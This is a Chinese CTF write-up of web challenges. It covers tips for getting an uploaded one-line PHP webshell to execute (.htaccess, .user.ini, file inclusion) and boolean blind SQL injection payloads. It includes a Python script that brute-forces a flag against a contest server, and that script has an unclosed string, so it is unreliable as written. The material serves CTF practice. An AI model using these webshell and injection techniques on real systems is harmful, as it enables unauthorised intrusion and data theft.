【web-ctf】ctf月赛和升级赛

文章目录

  • 2022/10/2 升级赛-web

2022/10/2 升级赛-web

学到的知识点:

第一题:文件上传漏洞+文件包含漏洞

  1. 传入一个无法解析的一句话木马后,可以尝试

(1)上传.htaccess或.user.ini文件。
(2)还是无法解析的话,可以查找每个页面的源代码,看看有没有文件包含漏洞。
(3)还是无法解析的话,可以尝试查找服务器用的php版本、中间件版本等,看该版本下有没有漏洞。

  1. 上传文件后,可以查看以下网页源代码,有可能会返回文件上传后的位置
  2. 上传文件后,可以尝试访问以下该文件,看传入后的文件中的某些字符是否被过滤或修改,如有修改,则可以尝试传一些其他的一句话木马。

第二题:布尔盲注

  1. locate函数可以用于布尔盲注,局限性,表中只能有一个表项,否则就会返回错误。

payload:id=‘{}’/(select(locate(binary(‘{}’),结果所在列名,{}))from(结果所在表名))/‘1’

第一个和第三个位置,填入盲注的字符的位置;第二个位置填入盲注使用的字符的二进制编码(因为在传入普通字符串的时候,locate函数是大小写不敏感的,所以需要使用binary函数转换为二进制字符串来处理)

  1. strcmp函数可以用于布尔盲注
import requests as req
import pytricks
import string

chars = ' !"#$%&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz'
# chars = string.ascii_letters + string.digits + "_{}"
ans = 'flag{'
j = 0

for pos in range(1,80):
	for ch in chars:
		t = (ans + ch)
		t = t.ascii_format("char(%d)",",")
		t = f"concat({t})"
		payload=f"""'and(pow(999,bin(strcmp((select(flag)from(flag)),binary({t}))))
		res = req.post('http://124.16.75.162:31012/',params={"id":payload})
		if 'error 1690' in res.text:
			ans += chr(ord(ch)-1)
			break
		if 'hack' in res.text:
			print("hack")
			exit()
		if 'error ' in res.text:
			print(res.text)
			exit()
	print(ans)
  1. 常见的flag所在表名和列名为flag,即select flag from flag

题解

你可能感兴趣的:(ctf,前端,数学建模)